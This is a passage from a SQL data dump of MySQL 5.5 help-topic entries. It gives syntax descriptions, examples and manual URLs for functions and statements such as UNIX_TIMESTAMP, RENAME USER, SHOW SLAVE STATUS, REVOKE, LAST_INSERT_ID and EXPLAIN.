0\n','http://dev.mysql.com/doc/refman/5.5/en/comparison-operators.html'),(218,'UNIX_TIMESTAMP',32,'Syntax:\nUNIX_TIMESTAMP(), UNIX_TIMESTAMP(date)\n\nIf called with no argument, returns a Unix timestamp (seconds since\n\'1970-01-01 00:00:00\' UTC) as an unsigned integer. If UNIX_TIMESTAMP()\nis called with a date argument, it returns the value of the argument as\nseconds since \'1970-01-01 00:00:00\' UTC. date may be a DATE string, a\nDATETIME string, a TIMESTAMP, or a number in the format YYMMDD or\nYYYYMMDD. The server interprets date as a value in the current time\nzone and converts it to an internal value in UTC. Clients can set their\ntime zone as described in\nhttp://dev.mysql.com/doc/refman/5.5/en/time-zone-support.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT UNIX_TIMESTAMP();\n -> 1196440210\nmysql> SELECT UNIX_TIMESTAMP(\'2007-11-30 10:30:19\');\n -> 1196440219\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(219,'DAYOFMONTH',32,'Syntax:\nDAYOFMONTH(date)\n\nReturns the day of the month for date, in the range 1 to 31, or 0 for\ndates such as \'0000-00-00\' or \'2008-00-00\' that have a zero day part.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT DAYOFMONTH(\'2007-02-03\');\n -> 3\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(220,'ASCII',38,'Syntax:\nASCII(str)\n\nReturns the numeric value of the leftmost character of the string str.\nReturns 0 if str is the empty string. Returns NULL if str is NULL.\nASCII() works for 8-bit characters.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT ASCII(\'2\');\n -> 50\nmysql> SELECT ASCII(2);\n -> 50\nmysql> SELECT ASCII(\'dx\');\n -> 100\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(221,'DIV',3,'Syntax:\nDIV\n\nInteger division. Similar to FLOOR(), but is safe with BIGINT values.\n\nAs of MySQL 5.5.3, if either operand has a noninteger type, the\noperands are converted to DECIMAL and divided using DECIMAL arithmetic\nbefore converting the result to BIGINT. If the result exceeds BIGINT\nrange, an error occurs. Before MySQL 5.5.3, incorrect results may occur\nfor noninteger operands that exceed BIGINT range.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html\n\n','mysql> SELECT 5 DIV 2;\n -> 2\n','http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html'),(222,'RENAME USER',10,'Syntax:\nRENAME USER old_user TO new_user\n [, old_user TO new_user] ...\n\nThe RENAME USER statement renames existing MySQL accounts. An error\noccurs for old accounts that do not exist or new accounts that already\nexist.\n\nTo use RENAME USER, you must have the global CREATE USER privilege or\nthe UPDATE privilege for the mysql database. When the read_only system\nvariable is enabled, RENAME USER additionally requires the SUPER\nprivilege.\n\nEach account name uses the format described in\nhttp://dev.mysql.com/doc/refman/5.5/en/account-names.html. For example:\n\nRENAME USER \'jeffrey\'@\'localhost\' TO \'jeff\'@\'127.0.0.1\';\n\nIf you specify only the user name part of the account name, a host name\npart of \'%\' is used.\n\nRENAME USER causes the privileges held by the old user to be those held\nby the new user. However, RENAME USER does not automatically drop or\ninvalidate databases or objects within them that the old user created.\nThis includes stored programs or views for which the DEFINER attribute\nnames the old user. Attempts to access such objects may produce an\nerror if they execute in definer security context. (For information\nabout security context, see\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-programs-security.html.)\n\nThe privilege changes take effect as indicated in\nhttp://dev.mysql.com/doc/refman/5.5/en/privilege-changes.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/rename-user.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/rename-user.html'),(223,'SHOW SLAVE STATUS',27,'Syntax:\nSHOW SLAVE STATUS\n\nThis statement provides status information on essential parameters of\nthe slave threads. It requires either the SUPER or REPLICATION CLIENT\nprivilege.\n\nIf you issue this statement using the mysql client, you can use a \\G\nstatement terminator rather than a semicolon to obtain a more readable\nvertical layout:\n\nmysql> SHOW SLAVE STATUS\\G\n*************************** 1. row ***************************\n Slave_IO_State: Waiting for master to send event\n Master_Host: localhost\n Master_User: root\n Master_Port: 3306\n Connect_Retry: 3\n Master_Log_File: gbichot-bin.005\n Read_Master_Log_Pos: 79\n Relay_Log_File: gbichot-relay-bin.005\n Relay_Log_Pos: 548\n Relay_Master_Log_File: gbichot-bin.005\n Slave_IO_Running: Yes\n Slave_SQL_Running: Yes\n Replicate_Do_DB:\n Replicate_Ignore_DB:\n Replicate_Do_Table:\n Replicate_Ignore_Table:\n Replicate_Wild_Do_Table:\n Replicate_Wild_Ignore_Table:\n Last_Errno: 0\n Last_Error:\n Skip_Counter: 0\n Exec_Master_Log_Pos: 79\n Relay_Log_Space: 552\n Until_Condition: None\n Until_Log_File:\n Until_Log_Pos: 0\n Master_SSL_Allowed: No\n Master_SSL_CA_File:\n Master_SSL_CA_Path:\n Master_SSL_Cert:\n Master_SSL_Cipher:\n Master_SSL_Key:\n Seconds_Behind_Master: 8\nMaster_SSL_Verify_Server_Cert: No\n Last_IO_Errno: 0\n Last_IO_Error:\n Last_SQL_Errno: 0\n Last_SQL_Error:\n Replicate_Ignore_Server_Ids: 0\n Master_Server_Id: 1\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/show-slave-status.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/show-slave-status.html'),(224,'GEOMETRY',35,'MySQL provides a standard way of creating spatial columns for geometry\ntypes, for example, with CREATE TABLE or ALTER TABLE. Spatial columns\nare supported for MyISAM, InnoDB, NDB, and ARCHIVE tables. See also the\nnotes about spatial indexes under [HELP SPATIAL].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/creating-spatial-columns.html\n\n','CREATE TABLE geom (g GEOMETRY);\n','http://dev.mysql.com/doc/refman/5.5/en/creating-spatial-columns.html'),(225,'NUMPOINTS',13,'NumPoints(ls)\n\nReturns the number of Point objects in the LineString value ls.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html\n\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT NumPoints(GeomFromText(@ls));\n+------------------------------+\n| NumPoints(GeomFromText(@ls)) |\n+------------------------------+\n| 3 |\n+------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-linestring-property-functions.html'),(226,'ALTER LOGFILE GROUP',40,'Syntax:\nALTER LOGFILE GROUP logfile_group\n ADD UNDOFILE \'file_name\'\n [INITIAL_SIZE [=] size]\n [WAIT]\n ENGINE [=] engine_name\n\nThis statement adds an UNDO file named \'file_name\' to an existing log\nfile group logfile_group. An ALTER LOGFILE GROUP statement has one and\nonly one ADD UNDOFILE clause. No DROP UNDOFILE clause is currently\nsupported.\n\n*Note*: All MySQL Cluster Disk Data objects share the same namespace.\nThis means that each Disk Data object must be uniquely named (and not\nmerely each Disk Data object of a given type). For example, you cannot\nhave a tablespace and an undo log file with the same name, or an undo\nlog file and a data file with the same name.\n\nThe optional INITIAL_SIZE parameter sets the UNDO file\'s initial size\nin bytes; if not specified, the initial size defaults to 134217728 (128\nMB). Prior to MySQL Cluster NDB 7.2.14, this value was required to be\nspecified using digits (Bug #13116514, Bug #16104705, Bug #62858); in\nMySQL Cluster NDB 7.2.14 and later, you may optionally follow size with\na one-letter abbreviation for an order of magnitude, similar to those\nused in my.cnf. Generally, this is one of the letters M (megabytes) or\nG (gigabytes).\n\nOn 32-bit systems, the maximum supported value for INITIAL_SIZE is\n4294967296 (4 GB). (Bug #29186)\n\nThe minimum allowed value for INITIAL_SIZE is 1048576 (1 MB). (Bug\n#29574)\n\n*Note*: WAIT is parsed but otherwise ignored. This keyword currently\nhas no effect, and is intended for future expansion.\n\nThe ENGINE parameter (required) determines the storage engine which is\nused by this log file group, with engine_name being the name of the\nstorage engine. Currently, the only accepted values for engine_name are\n\"NDBCLUSTER\" and \"NDB\". The two values are equivalent.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/alter-logfile-group.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/alter-logfile-group.html'),(227,'&',19,'Syntax:\n&\n\nBitwise AND:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html\n\n','mysql> SELECT 29 & 15;\n -> 13\n','http://dev.mysql.com/doc/refman/5.5/en/bit-functions.html'),(228,'LOCALTIMESTAMP',32,'Syntax:\nLOCALTIMESTAMP, LOCALTIMESTAMP()\n\nLOCALTIMESTAMP and LOCALTIMESTAMP() are synonyms for NOW().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(229,'ASSIGN-EQUAL',15,'Syntax:\n=\n\nThis operator is used to perform value assignments in two cases,\ndescribed in the next two paragraphs.\n\nWithin a SET statement, = is treated as an assignment operator that\ncauses the user variable on the left hand side of the operator to take\non the value to its right. (In other words, when used in a SET\nstatement, = is treated identically to :=.) The value on the right hand\nside may be a literal value, another variable storing a value, or any\nlegal expression that yields a scalar value, including the result of a\nquery (provided that this value is a scalar value). You can perform\nmultiple assignments in the same SET statement.\n\nIn the SET clause of an UPDATE statement, = also acts as an assignment\noperator; in this case, however, it causes the column named on the left\nhand side of the operator to assume the value given to the right,\nprovided any WHERE conditions that are part of the UPDATE are met. You\ncan make multiple assignments in the same SET clause of an UPDATE\nstatement.\n\nIn any other context, = is treated as a comparison operator.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/assignment-operators.html\n\n','mysql> SELECT @var1, @var2;\n -> NULL, NULL\nmysql> SELECT @var1 := 1, @var2;\n -> 1, NULL\nmysql> SELECT @var1, @var2;\n -> 1, NULL\nmysql> SELECT @var1, @var2 := @var1;\n -> 1, 1\nmysql> SELECT @var1, @var2;\n -> 1, 1\n','http://dev.mysql.com/doc/refman/5.5/en/assignment-operators.html'),(230,'CONVERT',38,'Syntax:\nCONVERT(expr,type), CONVERT(expr USING transcoding_name)\n\nThe CONVERT() and CAST() functions take an expression of any type and\nproduce a result value of a specified type.\n\nCAST() and CONVERT(... USING ...) are standard SQL syntax. The\nnon-USING form of CONVERT() is ODBC syntax.\n\nCONVERT() with USING converts data between different character sets. In\nMySQL, transcoding names are the same as the corresponding character\nset names. For example, this statement converts the string \'abc\' in the\ndefault character set to the corresponding string in the utf8 character\nset:\n\nSELECT CONVERT(\'abc\' USING utf8);\n\nThe type for the result can be one of the following values:\n\no BINARY[(N)]\n\no CHAR[(N)]\n\no DATE\n\no DATETIME\n\no DECIMAL[(M[,D])]\n\no SIGNED [INTEGER]\n\no TIME\n\no UNSIGNED [INTEGER]\n\nBINARY produces a string with the BINARY data type. See\nhttp://dev.mysql.com/doc/refman/5.5/en/binary-varbinary.html for a\ndescription of how this affects comparisons. If the optional length N\nis given, BINARY(N) causes the cast to use no more than N bytes of the\nargument. Values shorter than N bytes are padded with 0x00 bytes to a\nlength of N.\n\nCHAR(N) causes the cast to use no more than N characters of the\nargument.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/cast-functions.html\n\n','SELECT enum_col FROM tbl_name ORDER BY CAST(enum_col AS CHAR);\n','http://dev.mysql.com/doc/refman/5.5/en/cast-functions.html'),(231,'DROP LOGFILE GROUP',40,'Syntax:\nDROP LOGFILE GROUP logfile_group\n ENGINE [=] engine_name\n\nThis statement drops the log file group named logfile_group. The log\nfile group must already exist or an error results. (For information on\ncreating log file groups, see [HELP CREATE LOGFILE GROUP].)\n\n*Important*: Before dropping a log file group, you must drop all\ntablespaces that use that log file group for UNDO logging.\n\nThe required ENGINE clause provides the name of the storage engine used\nby the log file group to be dropped. Currently, the only permitted\nvalues for engine_name are NDB and NDBCLUSTER.\n\nDROP LOGFILE GROUP is useful only with Disk Data storage for MySQL\nCluster. See\nhttp://dev.mysql.com/doc/refman/5.5/en/mysql-cluster-disk-data.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/drop-logfile-group.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/drop-logfile-group.html'),(232,'ADDDATE',32,'Syntax:\nADDDATE(date,INTERVAL expr unit), ADDDATE(expr,days)\n\nWhen invoked with the INTERVAL form of the second argument, ADDDATE()\nis a synonym for DATE_ADD(). The related function SUBDATE() is a\nsynonym for DATE_SUB(). For information on the INTERVAL unit argument,\nsee the discussion for DATE_ADD().\n\nmysql> SELECT DATE_ADD(\'2008-01-02\', INTERVAL 31 DAY);\n -> \'2008-02-02\'\nmysql> SELECT ADDDATE(\'2008-01-02\', INTERVAL 31 DAY);\n -> \'2008-02-02\'\n\nWhen invoked with the days form of the second argument, MySQL treats it\nas an integer number of days to be added to expr.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT ADDDATE(\'2008-01-02\', 31);\n -> \'2008-02-02\'\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(233,'REPEAT LOOP',24,'Syntax:\n[begin_label:] REPEAT\n statement_list\nUNTIL search_condition\nEND REPEAT [end_label]\n\nThe statement list within a REPEAT statement is repeated until the\nsearch_condition expression is true. Thus, a REPEAT always enters the\nloop at least once. statement_list consists of one or more statements,\neach terminated by a semicolon (;) statement delimiter.\n\nA REPEAT statement can be labeled. For the rules regarding label use,\nsee [HELP labels].\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/repeat.html\n\n','mysql> delimiter //\n\nmysql> CREATE PROCEDURE dorepeat(p1 INT)\n -> BEGIN\n -> SET @x = 0;\n -> REPEAT\n -> SET @x = @x + 1;\n -> UNTIL @x > p1 END REPEAT;\n -> END\n -> //\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> CALL dorepeat(1000)//\nQuery OK, 0 rows affected (0.00 sec)\n\nmysql> SELECT @x//\n+------+\n| @x |\n+------+\n| 1001 |\n+------+\n1 row in set (0.00 sec)\n','http://dev.mysql.com/doc/refman/5.5/en/repeat.html'),(234,'ALTER FUNCTION',40,'Syntax:\nALTER FUNCTION func_name [characteristic ...]\n\ncharacteristic:\n COMMENT \'string\'\n | LANGUAGE SQL\n | { CONTAINS SQL | NO SQL | READS SQL DATA | MODIFIES SQL DATA }\n | SQL SECURITY { DEFINER | INVOKER }\n\nThis statement can be used to change the characteristics of a stored\nfunction. More than one change may be specified in an ALTER FUNCTION\nstatement. However, you cannot change the parameters or body of a\nstored function using this statement; to make such changes, you must\ndrop and re-create the function using DROP FUNCTION and CREATE\nFUNCTION.\n\nYou must have the ALTER ROUTINE privilege for the function. (That\nprivilege is granted automatically to the function creator.) If binary\nlogging is enabled, the ALTER FUNCTION statement might also require the\nSUPER privilege, as described in\nhttp://dev.mysql.com/doc/refman/5.5/en/stored-programs-logging.html.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/alter-function.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/alter-function.html'),(235,'SMALLINT',23,'SMALLINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA small integer. The signed range is -32768 to 32767. The unsigned\nrange is 0 to 65535.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(236,'DOUBLE PRECISION',23,'DOUBLE PRECISION[(M,D)] [UNSIGNED] [ZEROFILL], REAL[(M,D)] [UNSIGNED]\n[ZEROFILL]\n\nThese types are synonyms for DOUBLE. Exception: If the REAL_AS_FLOAT\nSQL mode is enabled, REAL is a synonym for FLOAT rather than DOUBLE.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(237,'ORD',38,'Syntax:\nORD(str)\n\nIf the leftmost character of the string str is a multibyte character,\nreturns the code for that character, calculated from the numeric values\nof its constituent bytes using this formula:\n\n (1st byte code)\n+ (2nd byte code * 256)\n+ (3rd byte code * 2562) ...\n\nIf the leftmost character is not a multibyte character, ORD() returns\nthe same value as the ASCII() function.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT ORD(\'2\');\n -> 50\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(238,'DEALLOCATE PREPARE',8,'Syntax:\n{DEALLOCATE | DROP} PREPARE stmt_name\n\nTo deallocate a prepared statement produced with PREPARE, use a\nDEALLOCATE PREPARE statement that refers to the prepared statement\nname. Attempting to execute a prepared statement after deallocating it\nresults in an error.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/deallocate-prepare.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/deallocate-prepare.html'),(239,'IS_FREE_LOCK',14,'Syntax:\nIS_FREE_LOCK(str)\n\nChecks whether the lock named str is free to use (that is, not locked).\nReturns 1 if the lock is free (no one is using the lock), 0 if the lock\nis in use, and NULL if an error occurs (such as an incorrect argument).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(240,'ENVELOPE',37,'Envelope(g)\n\nReturns the minimum bounding rectangle (MBR) for the geometry value g.\nThe result is returned as a Polygon value that is defined by the corner\npoints of the bounding box:\n\nPOLYGON((MINX MINY, MAXX MINY, MAXX MAXY, MINX MAXY, MINX MINY))\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html\n\n','mysql> SELECT AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\')));\n+-------------------------------------------------------+\n| AsText(Envelope(GeomFromText(\'LineString(1 1,2 2)\'))) |\n+-------------------------------------------------------+\n| POLYGON((1 1,2 1,2 2,1 2,1 1)) |\n+-------------------------------------------------------+\n','http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html'),(241,'TOUCHES',31,'Touches(g1,g2)\n\nReturns 1 or 0 to indicate whether g1 spatially touches g2. Two\ngeometries spatially touch if the interiors of the geometries do not\nintersect, but the boundary of one of the geometries intersects either\nthe boundary or the interior of the other.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-object-shapes.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/spatial-relation-functions-object-shapes.html'),(242,'INET_ATON',14,'Syntax:\nINET_ATON(expr)\n\nGiven the dotted-quad representation of an IPv4 network address as a\nstring, returns an integer that represents the numeric value of the\naddress in network byte order (big endian). INET_ATON() returns NULL if\nit does not understand its argument.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html\n\n','mysql> SELECT INET_ATON(\'10.0.5.9\');\n -> 167773449\n','http://dev.mysql.com/doc/refman/5.5/en/miscellaneous-functions.html'),(243,'UNCOMPRESS',12,'Syntax:\nUNCOMPRESS(string_to_uncompress)\n\nUncompresses a string compressed by the COMPRESS() function. If the\nargument is not a compressed value, the result is NULL. This function\nrequires MySQL to have been compiled with a compression library such as\nzlib. Otherwise, the return value is always NULL.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html\n\n','mysql> SELECT UNCOMPRESS(COMPRESS(\'any string\'));\n -> \'any string\'\nmysql> SELECT UNCOMPRESS(\'any string\');\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/encryption-functions.html'),(244,'AUTO_INCREMENT',23,'The AUTO_INCREMENT attribute can be used to generate a unique identity\nfor new rows:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/example-auto-increment.html\n\n','CREATE TABLE animals (\n id MEDIUMINT NOT NULL AUTO_INCREMENT,\n name CHAR(30) NOT NULL,\n PRIMARY KEY (id)\n);\n\nINSERT INTO animals (name) VALUES\n (\'dog\'),(\'cat\'),(\'penguin\'),\n (\'lax\'),(\'whale\'),(\'ostrich\');\n\nSELECT * FROM animals;\n','http://dev.mysql.com/doc/refman/5.5/en/example-auto-increment.html'),(245,'ISSIMPLE',37,'IsSimple(g)\n\nIn MySQL 5.5, this function is a placeholder that always returns 0.\n\nThe description of each instantiable geometric class given earlier in\nthe chapter includes the specific conditions that cause an instance of\nthat class to be classified as not simple. (See [HELP Geometry\nhierarchy].)\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-general-property-functions.html'),(246,'- BINARY',3,'Syntax:\n-\n\nSubtraction:\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html\n\n','mysql> SELECT 3-5;\n -> -2\n','http://dev.mysql.com/doc/refman/5.5/en/arithmetic-functions.html'),(247,'GEOMCOLLFROMTEXT',4,'GeomCollFromText(wkt[,srid]), GeometryCollectionFromText(wkt[,srid])\n\nConstructs a GeometryCollection value using its WKT representation and\nSRID.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-wkt-functions.html'),(248,'CURRENT_TIME',32,'Syntax:\nCURRENT_TIME, CURRENT_TIME()\n\nCURRENT_TIME and CURRENT_TIME() are synonyms for CURTIME().\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(249,'WKT DEFINITION',4,'The Well-Known Text (WKT) representation of geometry values is designed\nfor exchanging geometry data in ASCII form. The OpenGIS specification\nprovides a Backus-Naur grammar that specifies the formal production\nrules for writing WKT values (see\nhttp://dev.mysql.com/doc/refman/5.5/en/spatial-extensions.html).\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/gis-data-formats.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/gis-data-formats.html'),(250,'REVOKE',10,'Syntax:\nREVOKE\n priv_type [(column_list)]\n [, priv_type [(column_list)]] ...\n ON [object_type] priv_level\n FROM user [, user] ...\n\nREVOKE ALL PRIVILEGES, GRANT OPTION\n FROM user [, user] ...\n\nREVOKE PROXY ON user\n FROM user [, user] ...\n\nThe REVOKE statement enables system administrators to revoke privileges\nfrom MySQL accounts.\n\nWhen the read_only system variable is enabled, REVOKE requires the\nSUPER privilege in addition to any other required privileges described\nin the following discussion.\n\nEach account name uses the format described in\nhttp://dev.mysql.com/doc/refman/5.5/en/account-names.html. For example:\n\nREVOKE INSERT ON *.* FROM \'jeffrey\'@\'localhost\';\n\nIf you specify only the user name part of the account name, a host name\npart of \'%\' is used.\n\nFor details on the levels at which privileges exist, the permissible\npriv_type and priv_level values, and the syntax for specifying users\nand passwords, see [HELP GRANT]\n\nTo use the first REVOKE syntax, you must have the GRANT OPTION\nprivilege, and you must have the privileges that you are revoking.\n\nTo revoke all privileges, use the second syntax, which drops all\nglobal, database, table, column, and routine privileges for the named\nuser or users:\n\nREVOKE ALL PRIVILEGES, GRANT OPTION FROM user [, user] ...\n\nTo use this REVOKE syntax, you must have the global CREATE USER\nprivilege or the UPDATE privilege for the mysql database.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/revoke.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/revoke.html'),(251,'LAST_INSERT_ID',17,'Syntax:\nLAST_INSERT_ID(), LAST_INSERT_ID(expr)\n\nWith no argument, LAST_INSERT_ID() returns a 64-bit value representing\nthe first automatically generated value successfully inserted for an\nAUTO_INCREMENT column as a result of the most recently executed INSERT\nstatement. The value has a type of BIGINT UNSIGNED as of MySQL 5.5.29,\nBIGINT (signed) before that. The value of LAST_INSERT_ID() remains\nunchanged if no rows are successfully inserted.\n\nWith an argument, LAST_INSERT_ID() returns an unsigned integer as of\nMySQL 5.5.29, a signed integer before that.\n\nFor example, after inserting a row that generates an AUTO_INCREMENT\nvalue, you can get the value like this:\n\nmysql> SELECT LAST_INSERT_ID();\n -> 195\n\nThe currently executing statement does not affect the value of\nLAST_INSERT_ID(). Suppose that you generate an AUTO_INCREMENT value\nwith one statement, and then refer to LAST_INSERT_ID() in a\nmultiple-row INSERT statement that inserts rows into a table with its\nown AUTO_INCREMENT column. The value of LAST_INSERT_ID() will remain\nstable in the second statement; its value for the second and later rows\nis not affected by the earlier row insertions. (However, if you mix\nreferences to LAST_INSERT_ID() and LAST_INSERT_ID(expr), the effect is\nundefined.)\n\nIf the previous statement returned an error, the value of\nLAST_INSERT_ID() is undefined. For transactional tables, if the\nstatement is rolled back due to an error, the value of LAST_INSERT_ID()\nis left undefined. For manual ROLLBACK, the value of LAST_INSERT_ID()\nis not restored to that before the transaction; it remains as it was at\nthe point of the ROLLBACK.\n\nPrior to MySQL 5.5.35, this function was not replicated correctly if\nreplication filtering rules were in use. (Bug #17234370, Bug #69861)\n\nWithin the body of a stored routine (procedure or function) or a\ntrigger, the value of LAST_INSERT_ID() changes the same way as for\nstatements executed outside the body of these kinds of objects. The\neffect of a stored routine or trigger upon the value of\nLAST_INSERT_ID() that is seen by following statements depends on the\nkind of routine:\n\no If a stored procedure executes statements that change the value of\n LAST_INSERT_ID(), the changed value is seen by statements that follow\n the procedure call.\n\no For stored functions and triggers that change the value, the value is\n restored when the function or trigger ends, so following statements\n will not see a changed value.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/information-functions.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/information-functions.html'),(252,'LAST_DAY',32,'Syntax:\nLAST_DAY(date)\n\nTakes a date or datetime value and returns the corresponding value for\nthe last day of the month. Returns NULL if the argument is invalid.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html\n\n','mysql> SELECT LAST_DAY(\'2003-02-05\');\n -> \'2003-02-28\'\nmysql> SELECT LAST_DAY(\'2004-02-05\');\n -> \'2004-02-29\'\nmysql> SELECT LAST_DAY(\'2004-01-01 01:01:01\');\n -> \'2004-01-31\'\nmysql> SELECT LAST_DAY(\'2003-03-32\');\n -> NULL\n','http://dev.mysql.com/doc/refman/5.5/en/date-and-time-functions.html'),(253,'MEDIUMINT',23,'MEDIUMINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA medium-sized integer. The signed range is -8388608 to 8388607. The\nunsigned range is 0 to 16777215.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html\n\n','','http://dev.mysql.com/doc/refman/5.5/en/numeric-type-overview.html'),(254,'FLOOR',3,'Syntax:\nFLOOR(X)\n\nReturns the largest integer value not greater than X.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html\n\n','mysql> SELECT FLOOR(1.23);\n -> 1\nmysql> SELECT FLOOR(-1.23);\n -> -2\n','http://dev.mysql.com/doc/refman/5.5/en/mathematical-functions.html'),(255,'RTRIM',38,'Syntax:\nRTRIM(str)\n\nReturns the string str with trailing space characters removed.\n\nURL: http://dev.mysql.com/doc/refman/5.5/en/string-functions.html\n\n','mysql> SELECT RTRIM(\'barbar \');\n -> \'barbar\'\n','http://dev.mysql.com/doc/refman/5.5/en/string-functions.html'),(256,'EXPLAIN',29,'Syntax:\n{EXPLAIN | DESCRIBE | DESC}\n tbl_name [col_name | wild]\n\n{EXPLAIN | DESCRIBE | DESC}\n [explain_type] SELECT select_options\n\nexplain_type: {EXTENDED | PARTITIONS}\n\nThe DESCRIBE and EXPLAIN statements are synonyms. In practice, the\nDESCRIBE keyword is more often used to obtain information about table\nstructure, whereas EXPLAIN is used to obtain a query execution plan\n(that is, an explanation of how MySQL would execute a query). The\nfollowing discussion uses the DESCRIBE and EXPLAIN keywords in\naccordance with those uses, but the MySQL parser treats them as\ncompletely synonymous.\n\nObtaining Table Structure Information\n\nDESCRIBE provides information about the columns in a table:\n\nmysql> DESCRIBE City;\n+------------+----------+------+-----+---------+----------------+\n| Field | Type | Null | Key | Default | Extra |\n+------------+----------+------+-----+---------+----------------+\n| Id | int(11) | NO | PRI | NULL | auto_increment |\n| Name | char(35) | NO | | | |\n| Country | char(3) | NO | UNI | | |\n| District | char(20) | YES | MUL | | |\n| Population | int(11) | NO | | 0 | |\n+------------+----------+------+-----+---------+----------------+\n\nDESCRIBE is a shortcut for SHOW COLUMNS. These statements also display\ninformation for views. The description for SHOW COLUMNS provides more\ninformation about the output columns. See [HELP SHOW COLUMNS].\n\nBy default, DESCRIBE displays information about all columns in the\ntable. col_name, if given, is the name of a column in the table. In\nthis case, the statement displays information only for the named\ncolumn. wild, if given, is a pattern string. It can contain the SQL \"%\"\nand \"_\" wildcard characters. In this case, the statement displays\noutput only for the columns with names matching the string. There is no\nneed to enclose the string within quotation marks unless it contains\nspaces or other special characters.\n\nThe DESCRIBE statement is provided for compatibility with Oracle.\n\nThe SHOW CREATE TABLE, SHOW TABLE STATUS, and SHOW INDEX statements\nalso provide information about tables. See [HELP SHOW].\n\nObtaining Execution Plan Information\n\nThe EXPLAIN statement provides information about how MySQL executes\nstatements:\n\no When you precede a SELECT statement with the keyword EXPLAIN, MySQL\n displays information from the optimizer about the statement execution\n plan. That is, MySQL explains how it would process the statement,\n including information about how tables are joined and in which order.\n For information about using EXPLAIN to obtain execution plan\n information, see\n http://dev.mysql.com/doc/refman/5.5/en/explain-output.html.\n\no EXPLAIN EXTENDED can be used to obtain additional execution plan\n information. See\n http://dev.mysql.com/doc/refman/5.5/en/explain-extended.html.\n\no EXPLAIN PARTITIONS is useful for examining queries involving\n partitioned tables. See\n http://dev.mysql.com/doc/refman/5.5/en/partitioning-info.html.\n\nWith the help of EXPLAIN, you can see where you should add indexes to\ntables so that the statement executes faster by using indexes to find\nrows. You can also use EXPLAIN to check whether the optimizer joins the\ntables in an optimal order. To give a hint to the optimizer to use a\njoin order corresponding to the order in which the tables are named in\na SELECT statement, begin the statement with SELECT STRAIGHT_JOIN\nrather than just SELECT. (See\nhttp://dev.mysql.com/doc/refman/5.5/en/select.html.)\n\nIf you have a problem with 